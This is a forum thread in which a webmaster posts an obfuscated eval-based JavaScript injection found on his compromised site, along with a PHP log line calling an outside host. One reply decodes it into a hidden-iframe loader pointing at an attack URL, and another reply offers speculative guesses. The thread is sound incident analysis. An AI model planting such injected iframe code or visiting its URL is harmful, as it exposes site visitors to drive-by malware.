Print

Please login or register.
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length

[LordBucket]

Wow, ok...so, a website I made years ago was just reported by google as being malicious. So I've just spent the last several hours digging through logs and cleaning scripts from html files. There were a number of things going on, some of which I could identify, some of which I couldn't. In particular, the following script was being executed from the machine of some Lithuanian psychotherapist, followed by a search php script on a church website in Indonesia:

Code: [Select]

v=document.createTextNode('asd');var s;for(i in v)if(v[i]=='#text')b=1;b*=2;aa=document.createTextNode("ev"+"a"+"l");e=window[aa.nodeValue];e(String.fromCharCode(11-b,11-b,107-b,104-b,34-b,42-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b,100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,43-b,125-b,11-b,11-b,11-b,107-b,104-b,116-b,99-b,111-b,103-b,116-b,42-b,43-b,61-b,11-b,11-b,127-b,34-b,103-b,110-b,117-b,103-b,34-b,125-b,11-b,11-b,11-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,121-b,116-b,107-b,118-b,103-b,42-b,36-b,62-b,107-b,104-b,116-b,99-b,111-b,103-b,34-b,117-b,116-b,101-b,63-b,41-b,106-b,118-b,118-b,114-b,60-b,49-b,49-b,117-b,123-b,111-b,111-b,103-b,118-b,116-b,99-b,112-b,119-b,118-b,48-b,119-b,112-b,107-b,48-b,101-b,101-b,49-b,107-b,112-b,48-b,101-b,105-b,107-b,65-b,52-b,41-b,34-b,121-b,107-b,102-b,118-b,106-b,63-b,41-b,51-b,50-b,41-b,34-b,106-b,103-b,107-b,105-b,106-b,118-b,63-b,41-b,51-b,50-b,41-b,34-b,117-b,118-b,123-b,110-b,103-b,63-b,41-b,120-b,107-b,117-b,107-b,100-b,107-b,110-b,107-b,118-b,123-b,60-b,106-b,107-b,102-b,102-b,103-b,112-b,61-b,114-b,113-b,117-b,107-b,118-b,107-b,113-b,112-b,60-b,99-b,100-b,117-b,113-b,110-b,119-b,118-b,103-b,61-b,110-b,103-b,104-b,118-b,60-b,50-b,61-b,118-b,113-b,114-b,60-b,50-b,61-b,41-b,64-b,62-b,49-b,107-b,104-b,116-b,99-b,111-b,103-b,64-b,36-b,43-b,61-b,11-b,11-b,127-b,11-b,11-b,104-b,119-b,112-b,101-b,118-b,107-b,113-b,112-b,34-b,107-b,104-b,116-b,99-b,111-b,103-b,116-b,42-b,43-b,125-b,11-b,11-b,11-b,120-b,99-b,116-b,34-b,104-b,34-b,63-b,34-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,101-b,116-b,103-b,99-b,118-b,103-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,42-b,41-b,107-b,104-b,116-b,99-b,111-b,103-b,41-b,43-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,117-b,116-b,101-b,41-b,46-b,41-b,106-b,118-b,118-b,114-b,60-b,49-b,49-b,117-b,123-b,111-b,111-b,103-b,118-b,116-b,99-b,112-b,119-b,118-b,48-b,119-b,112-b,107-b,48-b,101-b,101-b,49-b,107-b,112-b,48-b,101-b,105-b,107-b,65-b,52-b,41-b,43-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,120-b,107-b,117-b,107-b,100-b,107-b,110-b,107-b,118-b,123-b,63-b,41-b,106-b,107-b,102-b,102-b,103-b,112-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,114-b,113-b,117-b,107-b,118-b,107-b,113-b,112-b,63-b,41-b,99-b,100-b,117-b,113-b,110-b,119-b,118-b,103-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,110-b,103-b,104-b,118-b,63-b,41-b,50-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,118-b,113-b,114-b,63-b,41-b,50-b,41-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,121-b,107-b,102-b,118-b,106-b,41-b,46-b,41-b,51-b,50-b,41-b,43-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,106-b,103-b,107-b,105-b,106-b,118-b,41-b,46-b,41-b,51-b,50-b,41-b,43-b,61-b,11-b,11-b,11-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b,100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,48-b,99-b,114-b,114-b,103-b,112-b,102-b,69-b,106-b,107-b,110-b,102-b,42-b,104-b,43-b,61-b,11-b,11-b,127-b));

I don't speak java, but it looks to me like it's simply creating a string of text. However, after some experimenting with document.write on w3schools.com, I've yet to get the above to evaluate to anything legible. My best guess is that the intent of the designer was to create some string of text, then pipe it to the search engine on the Indonesian webpage, presumably in an attempt to manipulate their result rankings. However, I don't see any indication of that actually happening, no attempt to pipe the text to the search, just two scripts executing in isolation.

Is anyone able to make sense of this?

I did find reference to two other scripts in the log files, lulu/poisonous.php and dixons/whirpool.php, but unfortuantely these scripts didn't exist by the time I got to this. But here's one of the error log entries:

Code: [Select]

PHP Warning:  file_get_contents(http://webchecker3.net/?file_get_contents) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: no suitable wrapper could be found in /home/jandjboo/public_html/dixons/whirpool.php on line 42

Dixon is a company, and they do apparently do repairs for Whirlpool appliances. But I don't immediately see how that connects to anything. I've identified the most likely security hole that allowed the site to be compromised in the first place, I have a huge pile of ftp logs listing which IPs did what and when, and for fun I've geolocated them to various parts of Lithuania and the Ukraine. But given the number of actions executed in few enough seconds, I get the impression bots were involved.

What I don't know is what they were trying to accomplish.

What does the above code translate to?

[thatkid]

Looks like incompetent bots were just being incompetent.

[Itnetlolor]

Just taking a wild guess, that looks like a trojan that when accessed by other users, acquires or deposits the necessary files to expand their ad popping up more often. They clean up the tracks when their task is done, but leave fragments behind to evolve into something harder to detect. Run Spybot/Malwarebytes to be safe.

At least, that's what the PHP thing leads me to believe. I don't have any real experience in the field, but I do recognize that PHP is a method of getting files, but I would imagine it could also be used to deposit files as well. Considering the types of companies, it sounds like an ad-virus which spreads via contact.

Like I said, just taking a wild guess or a shot in the dark.

[Mephisto]

b = 2 at the end of the first few statements. The big list of numbers with b subtracted from them is turned into a string, which is then `eval`uated. The string:

Code: [Select]

if(document.getElementsByTagName('body')[0]) {
    iframer();
    }
else {
    document.write("");
    }
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://symmetranut.uni.cc/in.cgi?2');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Spacing added by me to render this actually readable.

I do not advocate navigating to the link contained within. It is, quite obviously, listed as an attack site. I did not press my luck further.